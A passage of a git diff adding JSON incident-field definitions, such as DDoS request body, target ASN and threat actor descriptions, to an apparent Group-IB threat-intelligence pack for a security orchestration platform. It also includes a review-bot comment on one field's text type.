+        "GIB Cybercriminal Threat Actor"
+    ],
+    "threshold": 72,
+    "type": "multiSelect",
+    "unmapped": false,
+    "unsearchable": false,
+    "useAsKpi": false,
+    "version": -1,
+    "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Threat_Actor_Description.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Threat_Actor_Description.json
new file mode 100644
index 000000000000..1290f906341e
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Threat_Actor_Description.json
@@ -0,0 +1,34 @@
+{
+    "associatedToAll": false,
+    "associatedTypes": [
+        "GIB Cybercriminal Threat Actor"
+    ],
+    "caseInsensitive": true,
+    "cliName": "gibcybercriminalthreatactordescription",
+    "closeForm": true,
+    "content": true,
+    "editForm": true,
+    "group": 0,
+    "hidden": false,
+    "id": "incident_gibcybercriminalthreatactordescription",
+    "isReadOnly": false,
+    "itemVersion": "1.4.2",
+    "locked": false,
+    "name": "GIB Cybercriminal Threat Actor Description",
+    "neverSetAsRequired": false,
+    "openEnded": false,
+    "ownerOnly": false,
+    "required": false,
+    "sla": 0,
+    "system": false,
+    "systemAssociatedTypes": [
+        "GIB Cybercriminal Threat Actor"
+    ],
+    "threshold": 72,
+    "type": "longText",
+    "unmapped": false,
+    "unsearchable": false,
+    "useAsKpi": false,
+    "version": -1,
+    "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Threat_Actor_Report_Authors.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Threat_Actor_Report_Authors.json
new file mode 100644
index 000000000000..4c2417235551
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Threat_Actor_Report_Authors.json
@@ -0,0 +1,34 @@
+{
+    "associatedToAll": false,
+    "associatedTypes": [
+        "GIB Cybercriminal Threat Actor"
+    ],
+    "caseInsensitive": true,
+    "cliName": "gibcybercriminalthreatactorreportauthors",
+    "closeForm": true,
+    "content": true,
+    "editForm": true,
+    "group": 0,
+    "hidden": false,
+    "id": "incident_gibcybercriminalthreatactorreportauthors",
+    "isReadOnly": false,
+    "itemVersion": "1.4.2",
+    "locked": false,
+    "name": "GIB Cybercriminal Threat Actor Report Authors",
+    "neverSetAsRequired": false,
+    "openEnded": true,
+    "ownerOnly": false,
+    "required": false,
+    "sla": 0,
+    "system": false,
+    "systemAssociatedTypes": [
+        "GIB Cybercriminal Threat Actor"
+    ],
+    "threshold": 72,
+    "type": "multiSelect",
+    "unmapped": false,
+    "unsearchable": false,
+    "useAsKpi": false,
+    "version": -1,
+    "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Threat_Actor_Reports_Table.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Threat_Actor_Reports_Table.json
new file mode 100644
index 000000000000..cdb3acbcdf33
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Threat_Actor_Reports_Table.json
@@ -0,0 +1,80 @@
+{
+    "associatedToAll": false,
+    "associatedTypes": [
+        "GIB Cybercriminal Threat Actor"
+    ],
+    "caseInsensitive": true,
+    "cliName": "gibcybercriminalthreatactorreportstable",
+    "closeForm": true,
+    "columns": [
+        {
+            "displayName": "ID",
+            "fieldCalcScript": "",
+            "isDefault": true,
+            "isReadOnly": false,
+            "key": "id",
+            "orgType": "shortText",
+            "required": false,
+            "script": "",
+            "selectValues": null,
+            "type": "shortText",
+            "width": 181
+        },
+        {
+            "displayName": "Name",
+            "fieldCalcScript": "",
+            "isDefault": true,
+            "isReadOnly": false,
+            "key": "name",
+            "orgType": "shortText",
+            "required": false,
+            "script": "",
+            "selectValues": null,
+            "type": "shortText",
+            "width": 208
+        },
+        {
+            "displayName": "Date Published",
+            "fieldCalcScript": "",
+            "isDefault": true,
+            "isReadOnly": false,
+            "key": "datepublished",
+            "orgType": "date",
+            "required": false,
+            "script": "",
+            "selectValues": null,
+            "type": "date",
+            "width": 150
+        }
+    ],
+    "content": true,
+    "defaultRows": [
+        {}
+    ],
+    "editForm": true,
+    "group": 0,
+    "hidden": false,
+    "id": "incident_gibcybercriminalthreatactorreportstable",
+    "isReadOnly": false,
+    "locked": false,
+    "name": "GIB Cybercriminal Threat Actor Reports Table",
+    "neverSetAsRequired": false,
+    "openEnded": false,
+    "ownerOnly": false,
+    "propagationLabels": [
+        "all"
+    ],
+    "required": false,
+    "sla": 0,
+    "system": false,
+    "systemAssociatedTypes": [
+        "GIB Cybercriminal Threat Actor"
+    ],
+    "threshold": 72,
+    "type": "grid",
+    "unmapped": false,
+    "unsearchable": false,
+    "useAsKpi": false,
+    "version": -1,
+    "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Threat_Description.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Threat_Description.json
new file mode 100644
index 000000000000..401aa895cf1e
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Threat_Description.json
@@ -0,0 +1,34 @@
+{
+    "associatedToAll": false,
+    "associatedTypes": [
+        "GIB Cybercriminal Threat"
+    ],
+    "caseInsensitive": true,
+    "cliName": "gibcybercriminalthreatdescription",
+    "closeForm": true,
+    "content": true,
+    "editForm": true,
+    "group": 0,
+    "hidden": false,
+    "id": "incident_gibcybercriminalthreatdescription",
+    "isReadOnly": false,
+    "itemVersion": "1.4.2",
+    "locked": false,
+    "name": "GIB Cybercriminal Threat Description",
+    "neverSetAsRequired": false,
+    "openEnded": false,
+    "ownerOnly": false,
+    "required": false,
+    "sla": 0,
+    "system": false,
+    "systemAssociatedTypes": [
+        "GIB Cybercriminal Threat"
+    ],
+    "threshold": 72,
+    "type": "longText",
+    "unmapped": false,
+    "unsearchable": false,
+    "useAsKpi": false,
+    "version": -1,
+    "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Threat_Title.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Threat_Title.json
new file mode 100644
index 000000000000..bace2df405f2
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Threat_Title.json
@@ -0,0 +1,34 @@
+{
+    "associatedToAll": false,
+    "associatedTypes": [
+        "GIB Cybercriminal Threat"
+    ],
+    "caseInsensitive": true,
+    "cliName": "gibcybercriminalthreattitle",
+    "closeForm": true,
+    "content": true,
+    "editForm": true,
+    "group": 0,
+    "hidden": false,
+    "id": "incident_gibcybercriminalthreattitle",
+    "isReadOnly": false,
+    "itemVersion": "1.4.2",
+    "locked": false,
+    "name": "GIB Cybercriminal Threat Title",
+    "neverSetAsRequired": false,
+    "openEnded": false,
+    "ownerOnly": false,
+    "required": false,
+    "sla": 0,
+    "system": false,
+    "systemAssociatedTypes": [
+        "GIB Cybercriminal Threat"
+    ],
+    "threshold": 72,
+    "type": "shortText",
+    "unmapped": false,
+    "unsearchable": false,
+    "useAsKpi": false,
+    "version": -1,
+    "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Date_Begin.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Date_Begin.json
new file mode 100644
index 000000000000..46b009cf1add
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Date_Begin.json
@@ -0,0 +1,34 @@
+{
+    "associatedToAll": false,
+    "associatedTypes": [
+        "GIB Attacks DDOS"
+    ],
+    "caseInsensitive": true,
+    "cliName": "gibddosdatebegin",
+    "closeForm": true,
+    "content": true,
+    "editForm": true,
+    "group": 0,
+    "hidden": false,
+    "id": "incident_gibddosdatebegin",
+    "isReadOnly": false,
+    "itemVersion": "1.4.2",
+    "locked": false,
+    "name": "GIB DDOS Date Begin",
+    "neverSetAsRequired": false,
+    "openEnded": false,
+    "ownerOnly": false,
+    "required": false,
+    "sla": 0,
+    "system": false,
+    "systemAssociatedTypes": [
+        "GIB Attacks DDOS"
+    ],
+    "threshold": 72,
+    "type": "date",
+    "unmapped": false,
+    "unsearchable": false,
+    "useAsKpi": false,
+    "version": -1,
+    "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Date_End.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Date_End.json
new file mode 100644
index 000000000000..28f967c48bfc
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Date_End.json
@@ -0,0 +1,34 @@
+{
+    "associatedToAll": false,
+    "associatedTypes": [
+        "GIB Attacks DDOS"
+    ],
+    "caseInsensitive": true,
+    "cliName": "gibddosdateend",
+    "closeForm": true,
+    "content": true,
+    "editForm": true,
+    "group": 0,
+    "hidden": false,
+    "id": "incident_gibddosdateend",
+    "isReadOnly": false,
+    "itemVersion": "1.4.2",
+    "locked": false,
+    "name": "GIB DDOS Date End",
+    "neverSetAsRequired": false,
+    "openEnded": false,
+    "ownerOnly": false,
+    "required": false,
+    "sla": 0,
+    "system": false,
+    "systemAssociatedTypes": [
+        "GIB Attacks DDOS"
+    ],
+    "threshold": 72,
+    "type": "date",
+    "unmapped": false,
+    "unsearchable": false,
+    "useAsKpi": false,
+    "version": -1,
+    "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Date_Registration.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Date_Registration.json
new file mode 100644
index 000000000000..d463cdfaffc2
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Date_Registration.json
@@ -0,0 +1,34 @@
+{
+    "associatedToAll": false,
+    "associatedTypes": [
+        "GIB Attacks DDOS"
+    ],
+    "caseInsensitive": true,
+    "cliName": "gibddosdateregistration",
+    "closeForm": true,
+    "content": true,
+    "editForm": true,
+    "group": 0,
+    "hidden": false,
+    "id": "incident_gibddosdateregistration",
+    "isReadOnly": false,
+    "itemVersion": "1.4.2",
+    "locked": false,
+    "name": "GIB DDOS Date Registration",
+    "neverSetAsRequired": false,
+    "openEnded": false,
+    "ownerOnly": false,
+    "required": false,
+    "sla": 0,
+    "system": false,
+    "systemAssociatedTypes": [
+        "GIB Attacks DDOS"
+    ],
+    "threshold": 72,
+    "type": "date",
+    "unmapped": false,
+    "unsearchable": false,
+    "useAsKpi": false,
+    "version": -1,
+    "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Duration.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Duration.json
new file mode 100644
index 000000000000..4e362f8209c0
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Duration.json
@@ -0,0 +1,34 @@
+{
+    "associatedToAll": false,
+    "associatedTypes": [
+        "GIB Attacks DDOS"
+    ],
+    "caseInsensitive": true,
+    "cliName": "gibddosduration",
+    "closeForm": true,
+    "content": true,
+    "editForm": true,
+    "group": 0,
+    "hidden": false,
+    "id": "incident_gibddosduration",
+    "isReadOnly": false,
+    "itemVersion": "1.4.2",
+    "locked": false,
+    "name": "GIB DDOS Duration",
+    "neverSetAsRequired": false,
+    "openEnded": false,
+    "ownerOnly": false,
+    "required": false,
+    "sla": 0,
+    "system": false,
+    "systemAssociatedTypes": [
+        "GIB Attacks DDOS"
+    ],
+    "threshold": 72,
+    "type": "number",
+    "unmapped": false,
+    "unsearchable": false,
+    "useAsKpi": false,
+    "version": -1,
+    "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Protocol.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Protocol.json
new file mode 100644
index 000000000000..b672f360259c
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Protocol.json
@@ -0,0 +1,34 @@
+{
+    "associatedToAll": false,
+    "associatedTypes": [
+        "GIB Attacks DDOS"
+    ],
+    "caseInsensitive": true,
+    "cliName": "gibddosprotocol",
+    "closeForm": true,
+    "content": true,
+    "editForm": true,
+    "group": 0,
+    "hidden": false,
+    "id": "incident_gibddosprotocol",
+    "isReadOnly": false,
+    "itemVersion": "1.4.2",
+    "locked": false,
+    "name": "GIB DDOS Protocol",
+    "neverSetAsRequired": false,
+    "openEnded": false,
+    "ownerOnly": false,
+    "required": false,
+    "sla": 0,
+    "system": false,
+    "systemAssociatedTypes": [
+        "GIB Attacks DDOS"
+    ],
+    "threshold": 72,
+    "type": "shortText",
+    "unmapped": false,
+    "unsearchable": false,
+    "useAsKpi": false,
+    "version": -1,
+    "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Request_Body.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Request_Body.json
new file mode 100644
index 000000000000..93b88d4d17fb
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Request_Body.json
@@ -0,0 +1,34 @@
+{
+    "associatedToAll": false,
+    "associatedTypes": [
+        "GIB Attacks DDOS"
+    ],
+    "caseInsensitive": true,
+    "cliName": "gibddosrequestbody",
+    "closeForm": true,
+    "content": true,
+    "editForm": true,
+    "group": 0,
+    "hidden": false,
+    "id": "incident_gibddosrequestbody",
+    "isReadOnly": false,
+    "itemVersion": "1.4.2",
+    "locked": false,
+    "name": "GIB DDOS Request Body",
+    "neverSetAsRequired": false,
+    "openEnded": false,
+    "ownerOnly": false,
+    "required": false,
+    "sla": 0,
+    "system": false,
+    "systemAssociatedTypes": [
+        "GIB Attacks DDOS"
+    ],
+    "threshold": 72,
+    "type": "shortText",
+    "unmapped": false,
+    "unsearchable": false,
+    "useAsKpi": false,
+    "version": -1,
+    "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Request_Body_Hash.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Request_Body_Hash.json
new file mode 100644
index 000000000000..37f797a8a557
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Request_Body_Hash.json
@@ -0,0 +1,34 @@
+{
+    "associatedToAll": false,
+    "associatedTypes": [
+        "GIB Attacks DDOS"
+    ],
+    "caseInsensitive": true,
+    "cliName": "gibddosrequestbodyhash",
+    "closeForm": true,
+    "content": true,
+    "editForm": true,
+    "group": 0,
+    "hidden": false,
+    "id": "incident_gibddosrequestbodyhash",
+    "isReadOnly": false,
+    "itemVersion": "1.4.2",
+    "locked": false,
+    "name": "GIB DDOS Request Body Hash",
+    "neverSetAsRequired": false,
+    "openEnded": false,
+    "ownerOnly": false,
+    "required": false,
+    "sla": 0,
+    "system": false,
+    "systemAssociatedTypes": [
+        "GIB Attacks DDOS"
+    ],
+    "threshold": 72,
+    "type": "shortText",
+    "unmapped": false,
+    "unsearchable": false,
+    "useAsKpi": false,
+    "version": -1,
+    "fromVersion": "6.10.0"
+}
\ No newline at end of file
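Review bot: GIB DDOS Request Body is declared `"type": "shortText"` in the first hunk on this line, while its sibling GIB DDOS Request Headers Body two files further down is `longText`; a captured HTTP request body is at least as likely to be long as its headers, so a short-text field risks truncating or rejecting exactly the payload evidence the incident is meant to preserve. Consider `"type": "longText",` here unless the feed guarantees a bounded body length — the platform's short-text limit is not stated in this diff and should be confirmed. The Request Body Hash field in the second hunk is fine as shortText, since a digest has a fixed length.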
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Request_Data_Link.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Request_Data_Link.json
new file mode 100644
index 000000000000..f77162606efa
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Request_Data_Link.json
@@ -0,0 +1,34 @@
+{
+    "associatedToAll": false,
+    "associatedTypes": [
+        "GIB Attacks DDOS"
+    ],
+    "caseInsensitive": true,
+    "cliName": "gibddosrequestdatalink",
+    "closeForm": true,
+    "content": true,
+    "editForm": true,
+    "group": 0,
+    "hidden": false,
+    "id": "incident_gibddosrequestdatalink",
+    "isReadOnly": false,
+    "itemVersion": "1.4.2",
+    "locked": false,
+    "name": "GIB DDOS Request Data Link",
+    "neverSetAsRequired": false,
+    "openEnded": false,
+    "ownerOnly": false,
+    "required": false,
+    "sla": 0,
+    "system": false,
+    "systemAssociatedTypes": [
+        "GIB Attacks DDOS"
+    ],
+    "threshold": 72,
+    "type": "url",
+    "unmapped": false,
+    "unsearchable": false,
+    "useAsKpi": false,
+    "version": -1,
+    "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Request_Headers_Body.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Request_Headers_Body.json
new file mode 100644
index 000000000000..61785a86d07e
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Request_Headers_Body.json
@@ -0,0 +1,34 @@
+{
+    "associatedToAll": false,
+    "associatedTypes": [
+        "GIB Attacks DDOS"
+    ],
+    "caseInsensitive": true,
+    "cliName": "gibddosrequestheadersbody",
+    "closeForm": true,
+    "content": true,
+    "editForm": true,
+    "group": 0,
+    "hidden": false,
+    "id": "incident_gibddosrequestheadersbody",
+    "isReadOnly": false,
+    "itemVersion": "1.4.2",
+    "locked": false,
+    "name": "GIB DDOS Request Headers Body",
+    "neverSetAsRequired": false,
+    "openEnded": false,
+    "ownerOnly": false,
+    "required": false,
+    "sla": 0,
+    "system": false,
+    "systemAssociatedTypes": [
+        "GIB Attacks DDOS"
+    ],
+    "threshold": 72,
+    "type": "longText",
+    "unmapped": false,
+    "unsearchable": false,
+    "useAsKpi": false,
+    "version": -1,
+    "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Request_Headers_Hash.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Request_Headers_Hash.json
new file mode 100644
index 000000000000..f19756961d28
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Request_Headers_Hash.json
@@ -0,0 +1,34 @@
+{
+    "associatedToAll": false,
+    "associatedTypes": [
+        "GIB Attacks DDOS"
+    ],
+    "caseInsensitive": true,
+    "cliName": "gibddosrequestheadershash",
+    "closeForm": true,
+    "content": true,
+    "editForm": true,
+    "group": 0,
+    "hidden": false,
+    "id": "incident_gibddosrequestheadershash",
+    "isReadOnly": false,
+    "itemVersion": "1.4.2",
+    "locked": false,
+    "name": "GIB DDOS Request Headers Hash",
+    "neverSetAsRequired": false,
+    "openEnded": false,
+    "ownerOnly": false,
+    "required": false,
+    "sla": 0,
+    "system": false,
+    "systemAssociatedTypes": [
+        "GIB Attacks DDOS"
+    ],
+    "threshold": 72,
+    "type": "shortText",
+    "unmapped": false,
+    "unsearchable": false,
+    "useAsKpi": false,
+    "version": -1,
+    "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Source.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Source.json
new file mode 100644
index 000000000000..09ffceb1f6c1
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Source.json
@@ -0,0 +1,34 @@
+{
+    "associatedToAll": false,
+    "associatedTypes": [
+        "GIB Attacks DDOS"
+    ],
+    "caseInsensitive": true,
+    "cliName": "gibddossource",
+    "closeForm": true,
+    "content": true,
+    "editForm": true,
+    "group": 0,
+    "hidden": false,
+    "id": "incident_gibddossource",
+    "isReadOnly": false,
+    "itemVersion": "1.4.2",
+    "locked": false,
+    "name": "GIB DDOS Source",
+    "neverSetAsRequired": false,
+    "openEnded": false,
+    "ownerOnly": false,
+    "required": false,
+    "sla": 0,
+    "system": false,
+    "systemAssociatedTypes": [
+        "GIB Attacks DDOS"
+    ],
+    "threshold": 72,
+    "type": "shortText",
+    "unmapped": false,
+    "unsearchable": false,
+    "useAsKpi": false,
+    "version": -1,
+    "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_ASN.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_ASN.json
new file mode 100644
index 000000000000..779c0cbe4ad8
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_ASN.json
@@ -0,0 +1,34 @@
+{
+    "associatedToAll": false,
+    "associatedTypes": [
+        "GIB Attacks DDOS"
+    ],
+    "caseInsensitive": true,
+    "cliName": "gibddostargetasn",
+    "closeForm": true,
+    "content": true,
+    "editForm": true,
+    "group": 0,
+    "hidden": false,
+    "id": "incident_gibddostargetasn",
+    "isReadOnly": false,
+    "itemVersion": "1.4.2",
+    "locked": false,
+    "name": "GIB DDOS Target ASN",
+    "neverSetAsRequired": false,
+    "openEnded": false,
+    "ownerOnly": false,
+    "required": false,
+    "sla": 0,
+    "system": false,
+    "systemAssociatedTypes": [
+        "GIB Attacks DDOS"
+    ],
+    "threshold": 72,
+    "type": "shortText",
+    "unmapped": false,
+    "unsearchable": false,
+    "useAsKpi": false,
+    "version": -1,
+    "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_Category.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_Category.json
new file mode 100644
index 000000000000..8a41358538ee
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_Category.json
@@ -0,0 +1,34 @@
+{
+    "associatedToAll": false,
+    "associatedTypes": [
+        "GIB Attacks DDOS"
+    ],
+    "caseInsensitive": true,
+    "cliName": "gibddostargetcategory",
+    "closeForm": true,
+    "content": true,
+    "editForm": true,
+    "group": 0,
+    "hidden": false,
+    "id": "incident_gibddostargetcategory",
+    "isReadOnly": false,
+    "itemVersion": "1.4.2",
+    "locked": false,
+    "name": "GIB DDOS Target Category",
+    "neverSetAsRequired": false,
+    "openEnded": false,
+    "ownerOnly": false,
+    "required": false,
+    "sla": 0,
+    "system": false,
+    "systemAssociatedTypes": [
+        "GIB Attacks DDOS"
+    ],
+    "threshold": 72,
+    "type": "shortText",
+    "unmapped": false,
+    "unsearchable": false,
+    "useAsKpi": false,
+    "version": -1,
+    "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_City.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_City.json
new file mode 100644
index 000000000000..3813d5b2818c
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_City.json
@@ -0,0 +1,34 @@
+{
+    "associatedToAll": false,
+    "associatedTypes": [
+        "GIB Attacks DDOS"
+    ],
+    "caseInsensitive": true,
+    "cliName": "gibddostargetcity",
+    "closeForm": true,
+    "content": true,
+    "editForm": true,
+    "group": 0,
+    "hidden": false,
+    "id": "incident_gibddostargetcity",
+    "isReadOnly": false,
+    "itemVersion": "1.4.2",
+    "locked": false,
+    "name": "GIB DDOS Target City",
+    "neverSetAsRequired": false,
+    "openEnded": false,
+    "ownerOnly": false,
+    "required": false,
+    "sla": 0,
+    "system": false,
+    "systemAssociatedTypes": [
+        "GIB Attacks DDOS"
+    ],
+    "threshold": 72,
+    "type": "shortText",
+    "unmapped": false,
+    "unsearchable": false,
+    "useAsKpi": false,
+    "version": -1,
+    "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_Country_Code.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_Country_Code.json
new file mode 100644
index 000000000000..2cc59988338c
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_Country_Code.json
@@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks DDOS" + ], + "caseInsensitive": true, + "cliName": "gibddostargetcountrycode", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibddostargetcountrycode", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB DDOS Target Country Code", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks DDOS" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_Country_Name.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_Country_Name.json new file mode 100644 index 000000000000..4255c5622e03 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_Country_Name.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks DDOS" + ], + "caseInsensitive": true, + "cliName": "gibddostargetcountryname", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibddostargetcountryname", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB DDOS Target Country Name", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks DDOS" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file 
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_Domain.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_Domain.json new file mode 100644 index 000000000000..e8e89e23154f --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_Domain.json @@ -0,0 +1,37 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks DDOS" + ], + "caseInsensitive": true, + "cliName": "gibddostargetdomain", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibddostargetdomain", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB DDOS Target Domain", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "propagationLabels": [ + "all" + ], + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks DDOS" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_IP.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_IP.json new file mode 100644 index 000000000000..bafa61baf278 --- /dev/null +++ 